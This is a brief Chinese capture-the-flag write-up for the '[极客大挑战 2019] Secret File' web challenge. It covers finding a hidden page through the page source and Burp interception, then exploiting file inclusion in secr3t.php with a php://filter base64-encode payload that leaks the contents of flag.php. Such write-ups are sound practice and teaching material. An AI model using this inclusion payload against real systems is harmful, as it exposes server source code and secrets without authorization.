[极客大挑战 2019]Secret File-web
打开题目
查看源码
直接访问Archive_room.php
第二个页面是个点击框,这里bp抓包确认;若是直接SECRET,会跳到end.php
直接访问secr3t.php
代码审计一下
playload:secr3t.php?file=flag.php
改为php协议读取权限
secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php
base64解码得到flag